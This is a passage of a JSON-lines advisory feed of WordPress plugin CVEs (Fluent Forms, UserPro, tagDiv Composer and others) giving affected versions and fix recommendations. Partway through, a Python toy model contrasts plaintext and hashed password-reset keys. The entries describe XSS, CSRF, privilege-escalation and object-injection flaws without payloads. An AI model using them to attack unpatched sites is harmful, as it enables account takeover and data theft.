version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed4dfee-5f14-47ce-abed-cd226c110665?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed4dfee-5f14-47ce-abed-cd226c110665?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/app\\\/Services\\\/FormBuilder\\\/Components\\\/BaseComponent.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/app\\\/Services\\\/FormBuilder\\\/Components\\\/BaseComponent.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/boot\\\/globals.php#L342\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.1.17\\\/boot\\\/globals.php#L342\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6703","slug":"fluentform","versionImpact":"5.1.19","versionEndExcluding":"5.1.20","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018description\u2019 and 'btn_txt' parameters in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for attackers with the Form Manager permissions and Subscriber+ user role, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69dc9236-8079-434f-b2b5-060a0c5eba46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69dc9236-8079-434f-b2b5-060a0c5eba46?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FluentConversational\\\/Classes\\\/Elements\\\/WelcomeScreen.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FluentConversational\\\/Classes\\\/Elements\\\/WelcomeScreen.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2447","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.1. This is due to missing or incorrect nonce validation on the 'export_users' function. This makes it possible for unauthenticated attackers to export the users to a csv file, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0372efe4-b5be-4601-be43-5c12332ea1a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0372efe4-b5be-4601-be43-5c12332ea1a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2446","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to sensitive information disclosure via the 'userpro' shortcode in versions up to, and including, 5.1.1. This is due to insufficient restriction on sensitive user meta values that can be called via that shortcode. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to retrieve sensitive user meta that can be used to gain access to a high-privileged user account.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4072ba5f-6385-4fa3-85b6-89dac7b60a92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4072ba5f-6385-4fa3-85b6-89dac7b60a92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6008","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.1. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6e2b9e-3d70-4c07-a779-45164816b89c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6e2b9e-3d70-4c07-a779-45164816b89c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6007","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4f8798-c0f9-4d05-808e-375864a0ad95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4f8798-c0f9-4d05-808e-375864a0ad95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2449","slug":"userpro","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including, 5.1.1. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (userpro_process_form). The function uses the plaintext value of a password reset key instead of a hashed value, which means it can easily be retrieved and subsequently used. An attacker can leverage CVE-2023-2448 and CVE-2023-2446, or another vulnerability like SQL Injection in another plugin or theme installed on the site, to successfully exploit this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9be7bc-4f8a-4393-8ebb-1b1f141b7585?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9be7bc-4f8a-4393-8ebb-1b1f141b7585?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
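A worked model of the reset-key handling that CVE-2023-2449 above describes, as an added example written for this page in Python (not UserPro's code, and not a copy of WordPress core's). It puts a plaintext key store beside a keyed-hash store and shows why a read of the stored value (the `leak` helper stands in for the user-meta disclosure of CVE-2023-2446 or a similar read primitive) is enough to pass the reset check in one layout and useless in the other. The secret, the key lifetime and the "timestamp:value" column layout are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret and key lifetime; both are assumptions, not the plugin's values.
SITE_SECRET = b"constructed-site-secret"
KEY_TTL = 24 * 3600  # seconds a reset key stays valid


def key_digest(key: str) -> str:
    """Keyed hash of a reset key: what the database should hold instead of the key itself."""
    return hmac.new(SITE_SECRET, key.encode(), hashlib.sha256).hexdigest()


class ResetStore:
    """Minimal model of a per-user activation-key column. hashed=False is the vulnerable layout."""

    def __init__(self, hashed: bool):
        self.hashed = hashed
        self.rows = {}  # user -> "<issued_at>:<stored value>"

    def issue(self, user: str, now: int) -> str:
        key = secrets.token_urlsafe(24)                   # the value e-mailed to the user
        stored = key_digest(key) if self.hashed else key  # what lands in the database
        self.rows[user] = f"{now}:{stored}"
        return key

    def verify(self, user: str, presented: str, now: int) -> bool:
        row = self.rows.get(user)
        if row is None:
            return False
        issued_at, stored = row.split(":", 1)
        if now - int(issued_at) > KEY_TTL:
            return False
        candidate = key_digest(presented) if self.hashed else presented
        return hmac.compare_digest(candidate, stored)


def leak(store: ResetStore, user: str) -> str:
    """Stands in for reading the stored column through an unrelated disclosure bug."""
    return store.rows[user].split(":", 1)[1]


def attack(hashed: bool, now: int = 1_700_000_000) -> bool:
    """Does a database read of the stored value let an attacker pass the reset check?"""
    store = ResetStore(hashed=hashed)
    store.issue("admin", now)
    return store.verify("admin", leak(store, "admin"), now + 5)


def legitimate(hashed: bool, now: int = 1_700_000_000) -> tuple:
    """The real recipient still succeeds, and an expired key is refused in either layout."""
    store = ResetStore(hashed=hashed)
    key = store.issue("admin", now)
    return store.verify("admin", key, now + 60), store.verify("admin", key, now + KEY_TTL + 1)


if __name__ == "__main__":
    print("plaintext store, leaked value accepted:", attack(hashed=False))
    print("hashed store, leaked value accepted:   ", attack(hashed=True))
```

A keyed hash is used here so that the stored value cannot be turned back into the key even by someone who can read the column; for a high-entropy random key a plain SHA-256 would also resist preimage recovery, and WordPress core's own `get_password_reset_key()` stores a timestamped password-style hash in `user_activation_key` for the same reason.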
{"CVE_ID":"CVE-2024-5053","slug":"fluentform","versionImpact":"5.1.18","versionEndExcluding":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Mailchimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server.","recommendation":"Update to version 5.1.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Routes\\\/api.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Routes\\\/api.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/FormPolicy.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/FormPolicy.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/Integrations\\\/MailChimp\\\/MailChimp.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/Integrations\\\/MailChimp\\\/MailChimp.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3952","slug":"projectopia-core","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Projectopia \u2013 WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'pto_remove_logo' function in all versions up to, and including, 5.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/projectopia-core\\\/trunk\\\/includes\\\/functions\\\/admin\\\/admin_functions.php#L838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/projectopia-core\\\/trunk\\\/includes\\\/functions\\\/admin\\\/admin_functions.php#L838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284330\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284330\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7489e8-fe18-4a80-832c-aa62424c538b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7489e8-fe18-4a80-832c-aa62424c538b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4709","slug":"fluentform","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018subject\u2019 parameter in versions up to, and including, 5.1.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, and access granted by an administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe317a6-a391-441a-aac8-c8fa57e73169?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe317a6-a391-441a-aac8-c8fa57e73169?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L194\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2782","slug":"fluentform","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \/wp-json\/fluentform\/v1\/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/GlobalSettingsPolicy.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/GlobalSettingsPolicy.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2771","slug":"fluentform","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the \/wp-json\/fluentform\/v1\/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/071195d6-3452-4241-a8d3-92efc84e4850?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/071195d6-3452-4241-a8d3-92efc84e4850?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/RoleManagerPolicy.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/RoleManagerPolicy.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4157","slug":"fluentform","versionImpact":"5.1.15","versionEndExcluding":"5.1.16","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.1.15 via deserialization of untrusted input in the extractDynamicValues function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. Successful exploitation requires the attacker to have \"View Form\" and \"Manage Form\" permissions, which must be explicitly set by an administrator. However, this requirement can be bypassed when this vulnerability is chained with CVE-2024-2771.","recommendation":"Update to version 5.1.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8def156a-f2f2-4640-a1c9-c21c74e1f308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8def156a-f2f2-4640-a1c9-c21c74e1f308?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081740\\\/fluentform\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081740\\\/fluentform\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2772","slug":"fluentform","versionImpact":"5.1.13","versionEndExcluding":"5.1.14","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in all versions up to, and including, 5.1.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Fluent Forms settings, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This can be chained with CVE-2024-2771 for a low-privileged user to inject malicious web scripts.","recommendation":"Update to version 5.1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ccba77c-fb90-4906-b0fe-77607ec5df1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ccba77c-fb90-4906-b0fe-77607ec5df1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073857\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073857\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1333","slug":"dk-pricr-responsive-pricing-table","versionImpact":"5.1.10","versionEndExcluding":"5.1.11","description":"The Responsive Pricing Table WordPress plugin before 5.1.11 does not validate and escape some of its Pricing Table options before outputting them back in a page\/post where the related shortcode is embedded, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30546402-03b8-4e18-ad7e-04a6b556ffd7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30546402-03b8-4e18-ad7e-04a6b556ffd7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12045","slug":"essential-blocks","versionImpact":"5.1.0","versionEndExcluding":"5.1.1","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the marker title value of the Google Maps block in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210374\\\/essential-blocks\\\/tags\\\/5.1.1\\\/src\\\/blocks\\\/google-map\\\/src\\\/marker.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210374\\\/essential-blocks\\\/tags\\\/5.1.1\\\/src\\\/blocks\\\/google-map\\\/src\\\/marker.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b07f3ade-5f10-4621-99a2-18eeab993403?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b07f3ade-5f10-4621-99a2-18eeab993403?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3814","slug":"file-manager-advanced","versionEndExcluding":"5.1.1","description":"The Advanced File Manager WordPress plugin before 5.1.1 does not adequately authorize its usage on multisite installations, allowing site admin users to list and read arbitrary files and folders on the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca954ec6-6ebd-4d72-a323-570474e2e339\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca954ec6-6ebd-4d72-a323-570474e2e339\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0364","slug":"real-kit","versionEndExcluding":"5.1.1","description":"The real.Kit WordPress plugin before 5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e56759ae-7530-467a-b9ba-e9a404afb872\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e56759ae-7530-467a-b9ba-e9a404afb872\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5845","slug":"simple-social-buttons","versionImpact":"5.1.0","versionEndExcluding":"5.1.1","description":"The Simple Social Media Share Buttons WordPress plugin before 5.1.1 leaks password-protected post content to unauthenticated visitors in some meta tags","recommendation":"Update to version 5.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5b59e9e-85e5-4d26-aebe-64757c8495fa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5b59e9e-85e5-4d26-aebe-64757c8495fa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12626","slug":"automatorwp","versionImpact":"5.0.9","versionEndExcluding":"5.1.0","description":"The AutomatorWP \u2013 Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018a-0-o-search_field_value\u2019 parameter in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. When used in conjunction with the plugin's import and code action feature, this vulnerability can be leveraged to execute arbitrary code.","recommendation":"Update to version 5.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209794\\\/automatorwp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209794\\\/automatorwp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5212","slug":"td-composer","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018envato_code[]\u2019 parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db95415a-5354-498b-8368-58c47d9948de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db95415a-5354-498b-8368-58c47d9948de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3886","slug":"td-composer","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018envato_code[]\u2019 parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
